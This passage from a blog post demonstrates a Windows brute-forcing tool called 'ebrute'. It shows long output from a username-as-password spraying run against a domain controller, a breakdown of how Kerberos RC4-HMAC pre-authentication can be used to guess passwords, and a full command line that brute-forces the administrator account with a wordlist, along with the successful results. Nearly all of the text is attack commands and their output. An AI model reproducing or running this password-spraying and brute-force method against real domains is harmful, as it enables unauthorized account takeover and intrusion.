[18]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ARNOLD' | PASS: 'HIGGINBOTHAM.ARNOLD' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly r
duce threads (Attempt 1/5)]
[21]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ROLAND' | PASS: 'HIGGINBOTHAM.ROLAND' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly
educe threads (Attempt 1/5)]
Tasks remaining: 1,611,693    (Performance: ~394,111 tasks/minute, 5 minutes remain)
Tasks remaining: 1,218,180    (Performance: ~393,513 tasks/minute, 4 minutes remain)
Tasks remaining: 824,069    (Performance: ~394,111 tasks/minute, 3 minutes remain)
Increasing theadcount to: 33
Increasing theadcount to: 34
Increasing theadcount to: 35
Increasing theadcount to: 36
Increasing theadcount to: 37
Increasing theadcount to: 38
Increasing theadcount to: 39
Increasing theadcount to: 40
[28]  HOST: '192.168.8.88' | USER: 'MERRIWEATHER.DALE' | PASS: 'MERRIWEATHER.DALE' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
e threads (Attempt 1/5)]
Tasks remaining: 413,452    (Performance: ~410,617 tasks/minute, 2 minutes remain)
[19]  HOST: '192.168.8.88' | USER: 'SENG.MARIO' | PASS: 'SENG.MARIO' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
empt 1/5)]
[38]  HOST: '192.168.8.88' | USER: 'DANKO.SCOTT' | PASS: 'DANKO.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
ttempt 1/5)]
[8]  HOST: '192.168.8.88' | USER: 'TORIBIO.DARRELL' | PASS: 'TORIBIO.DARRELL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce th
eads (Attempt 1/5)]
Tasks remaining: 2,581    (Performance: ~410,871 tasks/minute, 1 minutes remain)
Complete: 07/12/2011 11:27:44
Stats:    00:06:13    (~401,925 tasks/minute) (Performed 2,500,000 / 2,500,000 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'


You now have many more user accounts to guess passwords for.

Kerberos Authentication
Kerberos authentication was undertaken establishing the cipher suites supported by each version of windows and reading of the RFCs.

Lots of different cipher suites are supported:
  • AES256-CTS-HMAC-SHA1-96
  • AES128-CTS-HMAC-SHA1-96
  • RC4-HMAC
  • DES-CBC-MD5
  • DES-CBC-CRC
Send an AS-REQ using one of the ciphers above
  • RC4-HMAC supported across Windows 2000/2003/2008
  • K = MD4 the user password (NTLM)
  • K1 = HMAC-MD5(K, MessageType)
  • Checksum = HMAC-MD5(K1,Timestamp)
  • K3 = HMAC-MD5(K1,Checksum)
  • EncryptedTimestamp = RC4(Timestamp,K3)
  • Request includes a concatenation of the Checksum and EncryptedTimestamp
An example below demonstrates the kerberos authentication plugin:

C:\tools\dev\br>ebrute -r kerbauth -u abc,administrator,test -j -n -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2dom
ain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Added:    3 user(s), 28,881 password(s), 1 host(s),  + joeycheck  + blankcheck 86,649 tasks over 32 thread/s.
Starting: 06/12/2011 15:46:12
[21]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[13]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:46:37
Stats:    00:00:25    (~136,486 tasks/minute) (Performed 56,918 / 86,649 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success'

Of course you could also use LDAP, SMB and FTP but kerberos is a lot quicker.
NB: The kerberos authentication plugin only runs over UDP at the moment and as such if you are getting errors you will have to resort to one of the other plugins. The kerberos enumeration plugin runs over both UDP and TCP with the former being quickest.

No comments:

Post a Comment